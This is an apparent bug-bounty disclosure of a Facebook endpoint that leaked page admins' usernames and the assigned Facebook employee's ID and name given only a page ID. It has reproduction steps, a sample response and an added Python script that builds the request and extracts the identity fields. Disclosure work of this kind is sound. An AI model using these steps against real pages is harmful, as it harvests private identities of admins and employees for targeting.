Description

This bug allowed an attacker to obtain the username of a page admin by supplying only the ID of the targeted page. The cause was an endpoint that returned the username of the admin who accepted the Terms of Service (TOS) for a page sticker (blue verification tick) or for Fan subscriptions (gaming pages). The same endpoint also leaked the ID and name of the Facebook employee assigned to support the page. A malicious user could therefore iterate over a list of verified pages and compile a large list of Facebook employee accounts.

Reproduction

Send a POST request to https://www.facebook.com/media/manager/fan_sticker_props/ with the required session parameters (such as __a and fb_dtsg) in the request body, together with the parameter:
page_id: the ID of the targeted page

This request would return the following response:

"payload":{"pageID":PAGE_ID,"pageName":"PAGE_NAME","spmMemberID":"EMPLOYEE_ID","spmMemberName":"EMPLOYEE_NAME","tosAcceptTime":"TIME","tosAcceptUserName":"USERNAME","stickerURL":null,"stickerDescription":null,"stickerFeedback":null,"stickerState":null}
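The request and response above, as an added worked example that is not part of the original report: the script builds the form body the report describes (page_id plus the attacker's own __a and fb_dtsg session values) and parses a response of the shape shown, separating the page metadata from the person-identifying fields that constitute the leak. It makes no network call; the sample response is constructed with fake values, the "for (;;);" JSON guard it strips is an assumption about how Facebook AJAX endpoints prefix their output, and the function names are hypothetical.

```python
"""
Added example (not code from the original report). Builds the POST body
described in the reproduction steps and parses a fan_sticker_props response
to extract the fields that disclose people rather than the page itself.
No request is sent; SAMPLE_RESPONSE is a constructed stand-in.
"""
import json
import re
from typing import Optional
from urllib.parse import urlencode

ENDPOINT = "https://www.facebook.com/media/manager/fan_sticker_props/"

# Assumption: Facebook AJAX endpoints prefix JSON with a JS guard such as
# "for (;;);" to defeat script inclusion; strip it defensively if present.
_GUARD = re.compile(r"^\s*for\s*\(\s*;\s*;\s*\)\s*;")

# Payload keys that identify a person (employee or TOS signer), not the page.
IDENTITY_FIELDS = ("spmMemberID", "spmMemberName", "tosAcceptUserName")


def build_form_body(page_id: str, fb_dtsg: str, extra: Optional[dict] = None) -> str:
    """Return the x-www-form-urlencoded body for the request in the report.

    __a=1 and fb_dtsg (the CSRF token of the requester's own session) are the
    required parameters the report names; page_id is the only attacker-chosen
    value. `extra` is a hypothetical hook for further session parameters.
    """
    params = {"__a": "1", "fb_dtsg": fb_dtsg, "page_id": str(page_id)}
    if extra:
        params.update(extra)
    return urlencode(params)


def parse_response(text: str) -> dict:
    """Strip the JS guard, decode the JSON, and return the payload object."""
    body = _GUARD.sub("", text, count=1)
    data = json.loads(body)
    payload = data.get("payload")
    if not isinstance(payload, dict):
        raise ValueError("no payload object in response")
    return payload


def disclosed_identities(payload: dict) -> dict:
    """Return only the person-identifying fields that are actually populated.

    A page with no assigned employee (spmMemberID null) or no recorded TOS
    signer yields an empty dict, so a caller can distinguish "endpoint
    answered" from "endpoint leaked something".
    """
    return {k: payload[k] for k in IDENTITY_FIELDS if payload.get(k)}


# Constructed sample mirroring the response shape in the report; all values fake.
SAMPLE_RESPONSE = (
    'for (;;);{"payload":{"pageID":123456789,"pageName":"Example Page",'
    '"spmMemberID":"100000000000001","spmMemberName":"Jane Doe",'
    '"tosAcceptTime":"1577836800","tosAcceptUserName":"pageadmin",'
    '"stickerURL":null,"stickerDescription":null,"stickerFeedback":null,'
    '"stickerState":null}}'
)

if __name__ == "__main__":
    print(build_form_body("123456789", "AQFake:token"))
    print(disclosed_identities(parse_response(SAMPLE_RESPONSE)))
```

Keeping the identity fields separate from the page fields is also the check a fix would need: a response to a caller who is not an admin of page_id should contain none of the keys in IDENTITY_FIELDS.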